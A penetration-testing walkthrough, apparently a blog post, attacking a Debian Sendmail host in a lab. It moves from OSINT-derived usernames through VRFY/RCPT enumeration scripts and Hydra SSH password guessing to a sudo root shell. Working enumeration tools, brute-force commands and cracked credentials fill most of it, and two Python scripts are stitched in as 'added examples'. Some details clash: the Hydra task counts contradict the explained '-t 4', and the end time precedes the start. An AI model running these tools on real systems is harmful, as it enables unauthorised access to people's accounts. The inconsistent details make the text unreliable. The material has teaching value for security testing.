Wednesday, April 24, 2019

Attacking SMTP on Debian Linux

First, let's do a quick version scan of the SSH and SMTP ports on the remote host.
root@asus:/mnt% nmap -sV -T4 -p22,25 mail.acme.com

Starting Nmap 7.01 ( https://nmap.org ) at 2018-12-28 19:39 MST
Nmap scan report for mail.acme.com
Host is up (0.00097s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
25/tcp open  smtp    Sendmail 8.15.2/8.15.2/Debian-8
MAC Address: 08:00:27:0C:B6:CC (Oracle VirtualBox virtual NIC)
Service Info: Host: debian9.acme.com; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.63 seconds
root@asus:/mnt% 

Verify SMTP service is accepting connections

To verify that the SMTP service is actually accepting commands (and not just an open port), we can connect to it with telnet and issue a few commands by hand.

root@asus:~/pentest_notes% telnet mail.acme.com 25
Trying mail.acme.com...
Connected to mail.acme.com.
Escape character is '^]'.
220 mail.acme.com ESMTP Sendmail 8.15.2/8.15.2/Debian-8; Fri, 28 Dec 2018 19:31:58 -0700;
HELO mail.acme.com
250 mail.acme.com Hello [77.x.x.x], pleased to meet you
quit
221 2.0.0 mail.acme.com closing connection
Connection closed by foreign host.
root@asus:~/pentest_notes%

Data set and user name enumeration

Next we need to build a list of candidate usernames from the employee names we gathered during OSINT.

Employee Names from Company Website
ray barnes
eaton gill
melodie foley
gail ramsey
amanda ruiz
blake wise
chanda goodman
perry tucker
arden clayton

From here we need to try different combinations of first and last name.

examples:
Ray Barnes = `rbarnes`
Ray Barnes = `rayb`
Ray Barnes = `r.barnes`
Ray Barnes = `ray`
Ray Barnes = `ray_barnes`
etc...

Our list should look something like this:

root@asus:~/pentest_notes% cat en.txt | sort | head -n 15
a.clayton
a_clayton
aclayton
amanda
amandar
arden
ardenc
a.ruiz
a_ruiz
aruiz
barnesr
blake
blakew
b.wise
b_wise
root@asus:~/pentest_notes% 
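The post shows the patterns by example but not how the list was produced. The following Python script is an added example (not the post's own tooling) that generates a username list from "first last" lines using the patterns seen above plus a few other common corporate conventions. It lowercases names, strips punctuation (so "O'Brien" becomes "obrien"), ignores middle names, skips single-token names that cannot form a login, and de-duplicates across the whole list. The pattern set and file names are assumptions you can adjust.

```python
import re

# Username patterns: f = first name, l = last name, fi/li = first/last initial.
# The first six are the ones seen in the post's list; the rest are common extras.
PATTERNS = ("{fi}{l}", "{f}{li}", "{fi}.{l}", "{fi}_{l}", "{f}", "{f}_{l}",
            "{f}.{l}", "{f}{l}", "{l}{fi}", "{l}")


def _clean(token):
    """Lowercase and drop anything that is not a-z or 0-9 ("O'Brien" -> "obrien")."""
    return re.sub(r"[^a-z0-9]", "", token.lower())


def make_usernames(full_name, patterns=PATTERNS):
    """Candidate logins for one 'first [middle] last' line; [] if there is no last name."""
    parts = [p for p in (_clean(t) for t in full_name.split()) if p]
    if len(parts) < 2:
        return []
    first, last = parts[0], parts[-1]          # middle names are ignored
    fields = {"f": first, "l": last, "fi": first[0], "li": last[0]}
    return [p.format(**fields) for p in patterns]


def build_wordlist(names, patterns=PATTERNS):
    """Unique candidates across all names, keeping first-seen order."""
    seen, out = set(), []
    for name in names:
        for user in make_usernames(name, patterns):
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


if __name__ == "__main__":
    import sys
    # Usage (assumed file names): python3 gen_users.py < names.txt > users.txt
    sys.stdout.write("\n".join(build_wordlist(sys.stdin.read().splitlines())) + "\n")
```

Non-ASCII letters are dropped by _clean, so accented names lose characters; transliterate them first if that matters for the target organisation.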

Verifying mail users using VRFY command

There are three SMTP commands we can use to check whether a user exists: VRFY, EXPN and RCPT TO. VRFY asks the server to confirm a mailbox, EXPN expands a mailing list into its members, and RCPT TO (issued after MAIL FROM) accepts or rejects a recipient, which leaks the same information even when the first two are switched off (in Sendmail via PrivacyOptions=novrfy,noexpn). In this example we use VRFY because we know it is allowed on this server. Rather than typing each name by hand, we can write a small script to walk the list.

----- SNIP -----

#!/usr/bin/env perl
# Enumerate mail users with VRFY: prints every candidate the server confirms.
use strict;
use warnings;

use Net::SMTP;

my $host = 'mail.acme.com';
my $list = shift @ARGV // 'users.txt';   # one candidate username per line

open(my $fh, '<', $list) or die "cannot open $list: $!";
chomp(my @users = <$fh>);
close($fh) or die $!;

# new() returns undef and sets $@ on failure, so check it before probing
my $s = Net::SMTP->new($host, Timeout => 30)
    or die "cannot connect to $host: $@";

for my $user (@users) {
    next if $user eq '';
    # verify() sends "VRFY $user" and is true on a 250/251 reply
    print "$user user exists\n" if $s->verify($user);
    sleep(1);    # one probe per second to keep the noise down
}
$s->quit;

----- SNIP -----

Now we can run the script against the server to find valid usernames.

root@asus:~/pentest_notes% ./enum_smtp_users.pl 
rbarnes user exists
egill user exists
mfoley user exists
gramsey user exists
aruiz user exists
bwise user exists
cgoodman user exists
ptucker user exists
aclayton user exists
root@asus:~/pentest_notes% 
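The Perl script above only speaks VRFY and only reports 250 replies. The following Python example is added here (it is not the post's script) to show all three probes from the section above and the fallback a practitioner needs: when VRFY answers 252 (Sendmail's novrfy setting) or 502 (EXPN disabled), it probes with MAIL FROM / RCPT TO instead. It runs offline against a FakeSendmail class constructed for this example to imitate the reply codes a Sendmail host gives; the host mail.acme.com, the HELO name probe.example.net and the sender probe@example.net are placeholders. Given a hostname and usernames on the command line it connects to a real port 25 instead.

```python
import socket

# Reply codes seen from the three probes: 250/251 mailbox exists (or is forwarded),
# 252 Sendmail novrfy ("Cannot VRFY user; try RCPT"), 500/502 command disabled or
# unknown, 550/551/553 no such user.
STATUS = {250: "exists", 251: "exists", 252: "ambiguous", 500: "disabled",
          502: "disabled", 550: "missing", 551: "missing", 553: "missing"}


class SmtpEnumerator:
    """Raw SMTP client over any object with sendall()/recv(): a socket or the fake below."""

    def __init__(self, conn, helo_name="probe.example.net", sender="probe@example.net"):
        self.conn, self.buf, self.sender = conn, b"", sender
        code, banner = self._reply()
        if code != 220:
            raise RuntimeError(f"unexpected banner: {code} {banner}")
        self._cmd(f"HELO {helo_name}")

    def _readline(self):
        while b"\r\n" not in self.buf:
            chunk = self.conn.recv(4096)
            if not chunk:
                raise ConnectionError("server closed the connection")
            self.buf += chunk
        line, _, self.buf = self.buf.partition(b"\r\n")
        return line.decode("latin-1")

    def _reply(self):
        lines = []                      # multi-line replies use "NNN-" until the final "NNN "
        while True:
            line = self._readline()
            lines.append(line[4:])
            if len(line) < 4 or line[3] != "-":
                return int(line[:3]), "\n".join(lines)

    def _cmd(self, text):
        self.conn.sendall((text + "\r\n").encode("ascii"))
        return self._reply()

    def vrfy(self, user):
        return STATUS.get(self._cmd(f"VRFY {user}")[0], "other")

    def expn(self, user):
        return STATUS.get(self._cmd(f"EXPN {user}")[0], "other")

    def rcpt(self, user):
        self._cmd("RSET")               # fresh envelope for every probe
        code, msg = self._cmd(f"MAIL FROM:<{self.sender}>")
        if code != 250:
            raise RuntimeError(f"MAIL FROM rejected: {code} {msg}")
        return STATUS.get(self._cmd(f"RCPT TO:<{user}>")[0], "other")

    def probe(self, user):
        """VRFY first; if the server will not confirm (252/502), fall back to RCPT TO."""
        status = self.vrfy(user)
        return self.rcpt(user) if status in ("ambiguous", "disabled") else status

    def quit(self):
        self._cmd("QUIT")


def enumerate_users(conn, candidates):
    client = SmtpEnumerator(conn)
    result = {user: client.probe(user) for user in candidates}
    client.quit()
    return result


class FakeSendmail:
    """Scripted stand-in for the target, constructed for this example (not a real host).
    vrfy_enabled=False imitates Sendmail's PrivacyOptions=novrfy,noexpn."""

    def __init__(self, users, vrfy_enabled=True):
        self.users, self.vrfy_enabled, self.have_sender = set(users), vrfy_enabled, False
        self.out = b"220 mail.acme.com ESMTP Sendmail 8.15.2/8.15.2/Debian-8; ready\r\n"

    def sendall(self, data):
        verb, _, arg = data.decode("ascii").strip().partition(" ")
        verb, arg = verb.upper(), arg.strip()
        if verb == "HELO":
            r = "250 mail.acme.com Hello [192.0.2.10], pleased to meet you"
        elif verb == "VRFY" and not self.vrfy_enabled:
            r = "252 2.5.2 Cannot VRFY user; try RCPT to attempt delivery"
        elif verb == "EXPN" and not self.vrfy_enabled:
            r = "502 5.7.0 Sorry, we do not allow this operation"
        elif verb in ("VRFY", "EXPN"):
            r = f"250 2.1.5 <{arg}@mail.acme.com>" if arg in self.users else f"550 5.1.1 {arg}... User unknown"
        elif verb == "RSET":
            self.have_sender, r = False, "250 2.0.0 Reset state"
        elif verb == "MAIL":
            self.have_sender, r = True, "250 2.1.0 Sender ok"
        elif verb == "RCPT" and not self.have_sender:
            r = "503 5.0.0 Need MAIL before RCPT"
        elif verb == "RCPT":
            local = arg[3:].strip("<>").split("@")[0]       # arg looks like "TO:<user>"
            r = "250 2.1.5 Recipient ok" if local in self.users else f"550 5.1.1 <{local}>... User unknown"
        elif verb == "QUIT":
            r = "221 2.0.0 mail.acme.com closing connection"
        else:
            r = "500 5.5.1 Command unrecognized"
        self.out += (r + "\r\n").encode("ascii")

    def recv(self, n):
        chunk, self.out = self.out[:n], self.out[n:]
        return chunk


if __name__ == "__main__":
    import sys
    # Live: python3 smtp_enum.py mail.acme.com rbarnes rayb ...; offline demo with no arguments.
    live = len(sys.argv) > 2
    conn = socket.create_connection((sys.argv[1], 25), timeout=10) if live else FakeSendmail(["rbarnes", "aclayton"], vrfy_enabled=False)
    for user, status in enumerate_users(conn, sys.argv[2:] or ["rbarnes", "rayb", "aclayton"]).items():
        print(f"{user:<10} {status}")
```

The 252 case is the one that bites: a Sendmail with novrfy does not say "no", it says "Cannot VRFY user; try RCPT", so a script that only tests for 250 reports every user as missing even though RCPT TO would still distinguish valid from invalid recipients.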

Only the first-initial-plus-surname pattern (rbarnes, egill, and so on) turned out to be valid on this host. Our next task is a dictionary attack against SSH with these nine usernames and passwords from the rockyou.txt word list, to see what we can find.

Cracking User Logins With Hydra

For the dictionary attack we are going to use Hydra. The -t 4 option limits Hydra to four parallel connections per target, which is what Hydra itself recommends for SSH, since sshd throttles unauthenticated connections and a higher task count just produces errors. The password file used here is a short cut of rockyou.txt (nine entries, as the [DATA] line below shows).

root@asus:~/pentest_notes% hydra -L smtp-users.txt -P ry-smtp.txt -t 4 mail.acme.com ssh
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-29 10:09:27
[DATA] max 16 tasks per 1 server, overall 64 tasks, 81 login tries (l:9/p:9), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: mail.acme.com   login: rbarnes   password: YOUSUCK!
[22][ssh] host: mail.acme.com   login: egill   password: fulori
[22][ssh] host: mail.acme.com   login: mfoley   password: pielagorda
[22][ssh] host: mail.acme.com   login: gramsey   password: shin4ever
[22][ssh] host: mail.acme.com   login: aruiz   password: bubba98
[22][ssh] host: mail.acme.com   login: bwise   password: 241729
[22][ssh] host: mail.acme.com   login: cgoodman   password: almaleticia
[22][ssh] host: mail.acme.com   login: ptucker   password: sdsmfree
[22][ssh] host: mail.acme.com   login: aclayton   password: lak6510
1 of 1 target successfully completed, 9 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-12-27 22:55:50
root@asus:~/pentest_notes% 

Verify remote login users and passwords

Hydra reported a password for all nine accounts. Our next task is to test them over SSH and see whether these logins actually work.

root@asus:~/pentest_notes% ssh -l rbarnes 192.168.0.114
rbarnes@192.168.0.114's password: 
Linux debian9 4.9.0-8-686 #1 SMP Debian 4.9.130-2 (2018-10-27) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
rbarnes@debian9:~$ id
uid=1005(rbarnes) gid=1005(rbarnes) groups=1005(rbarnes)
rbarnes@debian9:~$ sudo -s

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for rbarnes: 
rbarnes is not in the sudoers file.  This incident will be reported.
rbarnes@debian9:~$ 

The login works, but rbarnes is not in the sudoers file (the id output shows no sudo group membership either). Also note that sudo logs the failed attempt and, by default, mails a report to root, so this kind of probing is visible to an administrator.

Privilege Escalation to root

If we try the other accounts, we find one whose id output shows membership in group 27 (sudo); on Debian that group is granted full sudo rights by default.

root@asus:~/pentest_notes% ssh -l aclayton 192.168.0.114
aclayton@192.168.0.114's password: 
Linux debian9 4.9.0-8-686 #1 SMP Debian 4.9.130-2 (2018-10-27) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 26 20:12:09 2018 from 192.168.0.100
aclayton@debian9:~$ id
uid=1001(aclayton) gid=1001(aclayton) groups=1001(aclayton),27(sudo)
aclayton@debian9:~$ sudo -s

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for aclayton: 
root@debian9:/home/aclayton# id
uid=0(root) gid=0(root) groups=0(root)
root@debian9:/home/aclayton#
As you can see, issuing `sudo -s` with the password we cracked earlier gives us a root shell, starting from nothing more than a list of names on the company website.
